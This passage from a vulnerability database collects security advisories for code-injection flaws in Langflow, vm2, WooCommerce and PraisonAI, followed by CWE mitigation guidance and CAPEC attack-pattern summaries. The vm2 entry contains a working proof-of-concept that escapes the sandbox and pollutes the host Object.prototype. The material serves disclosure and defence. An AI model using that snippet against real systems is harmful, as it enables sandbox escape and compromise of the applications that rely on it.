"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017"
},
{
"type": "WEB",
"url": "https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A",
"type": "CVSS_V4"
}
],
"summary": "Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint"
}
GHSA-VWRP-X96C-MHWQ
Vulnerability from github – Published: 2026-05-07 04:07 – Updated: 2026-05-14 20:36Summary
vm2's bridge exposes mutable proxies for real host-realm intrinsic prototypes and then forwards sandbox writes into the underlying host objects with otherReflectSet() and otherReflectDefineProperty(), which lets attacker-controlled JavaScript running in a default VM or inherited NodeVM mutate shared host Object.prototype, Array.prototype, and Function.prototype from inside the sandbox.
Details
BaseHandler.apply() unwraps sandbox-controlled receivers and arguments with otherFromThis() / otherFromThisArguments() and then directly invokes the real host function with ret = otherReflectApply(object, context, args), so any default-exposed host function that can surface a prototype getter becomes a prototype-walking primitive (lib/bridge.js:665-676). BaseHandler.get() special-cases proto and returns the host-side descriptor or proxy target prototype, which is enough for the attacker to reuse the host lookupGetter('proto') accessor repeatedly until the walk lands on host Object.prototype, Array.prototype, or Function.prototype (lib/bridge.js:590-616). Once the attacker has a proxy to a host intrinsic prototype, BaseHandler.set() performs value = otherFromThis(value); return otherReflectSet(object, key, value) === true;, which writes attacker-controlled data directly into the shared host object instead of keeping the mutation sandbox-local; BaseHandler.defineProperty() repeats the same design at otherReflectDefineProperty(object, prop, otherDesc) for descriptor-based writes (lib/bridge.js:641-649, lib/bridge.js:753-774). Existing validation does not stop the attack because the constructor filter only blocks one dangerous-property access pattern, setPrototypeOf() only blocks prototype replacement rather than ordinary property assignment, and containsDangerousConstructor() only protects one later re-unwrapping path instead of the initial host-prototype write sink (lib/bridge.js:494-530, lib/bridge.js:595-610, lib/bridge.js:660-662).
PoC
Run the following code snippet and observe that the value of vm2EscapeMarker is polluted:
const { VM } = require('vm2');
const vm = new VM();
vm.run(`
const g = ({}).__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const hostObjectProto = p.call(p.call(p.call(p.call(Buffer.of()))));
hostObjectProto.vm2EscapeMarker = 'polluted-object-prototype';
`);
console.log({}.vm2EscapeMarker)
Impact
Sandbox escape and prototype pollution.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.10.5"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "3.9.6"
},
{
"fixed": "3.11.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44005"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T04:07:05Z",
"nvd_published_at": "2026-05-13T18:16:17Z",
"severity": "CRITICAL"
},
"details": "### Summary\nvm2\u0027s bridge exposes mutable proxies for real host-realm intrinsic prototypes and then forwards sandbox writes into the underlying host objects with otherReflectSet() and otherReflectDefineProperty(), which lets attacker-controlled JavaScript running in a default VM or inherited NodeVM mutate shared host Object.prototype, Array.prototype, and Function.prototype from inside the sandbox.\n\n### Details\nBaseHandler.apply() unwraps sandbox-controlled receivers and arguments with otherFromThis() / otherFromThisArguments() and then directly invokes the real host function with ret = otherReflectApply(object, context, args), so any default-exposed host function that can surface a prototype getter becomes a prototype-walking primitive ([lib/bridge.js:665-676](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L665-L676)). BaseHandler.get() special-cases __proto__ and returns the host-side descriptor or proxy target prototype, which is enough for the attacker to reuse the host __lookupGetter__(\u0027__proto__\u0027) accessor repeatedly until the walk lands on host Object.prototype, Array.prototype, or Function.prototype ([lib/bridge.js:590-616](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L590-L616)). Once the attacker has a proxy to a host intrinsic prototype, BaseHandler.set() performs value = otherFromThis(value); return otherReflectSet(object, key, value) === true;, which writes attacker-controlled data directly into the shared host object instead of keeping the mutation sandbox-local; BaseHandler.defineProperty() repeats the same design at otherReflectDefineProperty(object, prop, otherDesc) for descriptor-based writes ([lib/bridge.js:641-649](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L641-L649), [lib/bridge.js:753-774](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L753-L774)). Existing validation does not stop the attack because the constructor filter only blocks one dangerous-property access pattern, setPrototypeOf() only blocks prototype replacement rather than ordinary property assignment, and containsDangerousConstructor() only protects one later re-unwrapping path instead of the initial host-prototype write sink ([lib/bridge.js:494-530](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L494-L530), [lib/bridge.js:595-610](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L595-L610), [lib/bridge.js:660-662](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L660-L662)).\n\n### PoC\nRun the following code snippet and observe that the value of vm2EscapeMarker is polluted:\n```\nconst { VM } = require(\u0027vm2\u0027);\nconst vm = new VM();\nvm.run(`\n const g = ({}).__lookupGetter__;\n const a = Buffer.apply;\n const p = a.apply(g, [Buffer, [\u0027__proto__\u0027]]);\n const hostObjectProto = p.call(p.call(p.call(p.call(Buffer.of()))));\n hostObjectProto.vm2EscapeMarker = \u0027polluted-object-prototype\u0027;\n`);\nconsole.log({}.vm2EscapeMarker)\n```\n\n### Impact\nSandbox escape and prototype pollution.",
"id": "GHSA-vwrp-x96c-mhwq",
"modified": "2026-05-14T20:36:31Z",
"published": "2026-05-07T04:07:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-vwrp-x96c-mhwq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44005"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2: Mutable Proxies for Host Intrinsic Prototypes Allows Sandbox Escape"
}
GHSA-VWRR-Q8R4-3HGF
Vulnerability from github – Published: 2022-05-14 01:35 – Updated: 2024-10-17 15:31In the Automattic WooCommerce plugin before 3.2.4 for WordPress, an attack is possible after gaining access to the target site with a user account that has at least Shop manager privileges. The attacker then constructs a specifically crafted string that will turn into a PHP object injection involving the includes/shortcodes/class-wc-shortcode-products.php WC_Shortcode_Products::get_products() use of cached queries within shortcodes.
{
"affected": [],
"aliases": [
"CVE-2017-18356"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-01-15T16:29:00Z",
"severity": "HIGH"
},
"details": "In the Automattic WooCommerce plugin before 3.2.4 for WordPress, an attack is possible after gaining access to the target site with a user account that has at least Shop manager privileges. The attacker then constructs a specifically crafted string that will turn into a PHP object injection involving the includes/shortcodes/class-wc-shortcode-products.php WC_Shortcode_Products::get_products() use of cached queries within shortcodes.",
"id": "GHSA-vwrr-q8r4-3hgf",
"modified": "2024-10-17T15:31:05Z",
"published": "2022-05-14T01:35:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18356"
},
{
"type": "WEB",
"url": "https://blog.ripstech.com/2018/woocommerce-php-object-injection"
},
{
"type": "WEB",
"url": "https://woocommerce.wordpress.com/2017/11/16/woocommerce-3-2-4-security-fix-release-notes"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VWV5-32VR-3JCP
Vulnerability from github – Published: 2026-07-10 15:31 – Updated: 2026-07-10 15:31PraisonAI versions before 4.6.78 contain a code injection vulnerability in deploy/api.py where the agents_file parameter is directly interpolated into an f-string without sanitization. Attackers can inject arbitrary Python code that executes when the generated server code runs via subprocess.Popen().
{
"affected": [],
"aliases": [
"CVE-2026-61444"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-10T15:16:50Z",
"severity": "CRITICAL"
},
"details": "PraisonAI versions before 4.6.78 contain a code injection vulnerability in deploy/api.py where the agents_file parameter is directly interpolated into an f-string without sanitization. Attackers can inject arbitrary Python code that executes when the generated server code runs via subprocess.Popen().",
"id": "GHSA-vwv5-32vr-3jcp",
"modified": "2026-07-10T15:31:42Z",
"published": "2026-07-10T15:31:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g6j7-pffp-8whg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-61444"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/praisonai-before-code-injection-via-f-string"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
Strategy: Refactoring
Refactor your program so that you do not have to dynamically generate code.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Mitigation MIT-32
Strategy: Compilation or Build Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-32
Strategy: Environment Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-242: Code Injection
An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.